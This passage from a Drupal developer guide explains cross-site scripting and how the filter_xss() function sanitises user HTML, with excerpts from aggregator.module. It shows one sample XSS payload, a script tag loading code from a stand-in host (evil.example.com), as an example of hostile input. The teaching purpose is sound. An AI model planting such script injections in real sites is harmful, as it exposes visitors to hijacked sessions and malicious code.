Using filterxss
Cross Site Scripting (XSS) is a common form of attack on a web site where the attacker is able to insert his or her own code into a web page, which can then be used for all sorts of mischief.
Note For examples of XSS attacks, see http://ha.ckers.org/xss.html.
Suppose that you allow users to enter HTML on your web site, expecting them to enter <em>Hi!</em> My name is Sally, and I... but instead they enter
<script src=http://evil.example.com/xss.js"></script>
Whoops! Again, the lesson is: never trust user input. Here is the function signature of filter_xss():
filter_xss($string, $allowed_tags = array('a', 'em', 'strong', 'cite', 'code', 'ul', 'ol', 'li', 'dl', 'dt', 'dd'))
The filter_xss() function performs the following operations on the text string it is given:
1. It removes odd characters such as NULL and Netscape 4 JavaScript entities.
2. It ensures that HTML entities such as & are well formed.
3. It ensures that HTML tags and tag attributes are well formed. During this process, tags that are not on the whitelist—that is, the second parameter for filter_xss()—are removed. The style attribute is removed, too, because that can interfere with the layout of a page by overriding CSS or hiding content by setting a spammer's link color to the background color of the page. If you write regular expressions for fun and can name character codes for HTML entities from memory, you'll enjoy stepping through filter_xss() (found in modules/filter/filter.module) and its associated functions with a debugger.
4. It ensures that no HTML tags contain disallowed protocols. Allowed protocols are http, https, ftp, news, nntp, telnet, mailto, irc, ssh, sftp, and webcal. You can modify this list by setting the filter_allowed_protocols variable. For example, you could restrict the protocols to http and https by adding the following line to your settings .php file (see the comment about variable overrides in the settings. php file):
'filter_allowed_protocols' => array('http', 'https')
Here's an example of the use of filter_xss() from aggregator.module, a module that deals with potentially dangerous RSS or Atom feeds. Here the module is preparing to display a feed:
function theme_aggregator_feed($feed) { $output = '<div class="feed-source">'; $output .= theme('feed_icon', $feed->url) ."\n"; $output .= $feed->image; $output .= '<div class="feed-description">'.
aggregator_filter_xss($feed->description) ."</div>\n"; $output .= '<div class="feed-url"><em>'. t('URL:') .'</em> '
. l($feed->link, $feed->link, array(), NULL, NULL, TRUE) ."</div>\n";
Sharp-eyed readers will note that the call to l() in our example code from theme_ aggregator_feed() just passes $feed->link as a parameter to l() without doing any checking. That's because the l() function has a check_plain() call inside it for convenience. Other places where check_plain() is called automatically are when the menu hook gathers titles of menu items and in theme('placeholder'). Other than these cases, you should always call check_plain() yourself to ensure security.
Note the call to aggregator_filter_xss(), which is a wrapper for filter_xss() and provides an array of acceptable HTML tags. We have slightly simplified the function in the following code:
* Safely render HTML content, as allowed.
function aggregator_filter_xss($value) { $tags = variable_get("aggregator_allowed_html_tags",
'<a> <b> <br> <dd> <dl> <dt> <em> <i> <li> <ol> <p> <strong> <u> <ul>'); // Turn tag list into an array so we can pass it as a parameter. $allowed_tags = preg_split('/\s+|<|>/', $tags, -1, PREG_SPLIT_NO_EMPTY)); return filter_xss($value, $allowed_tags);
Post a comment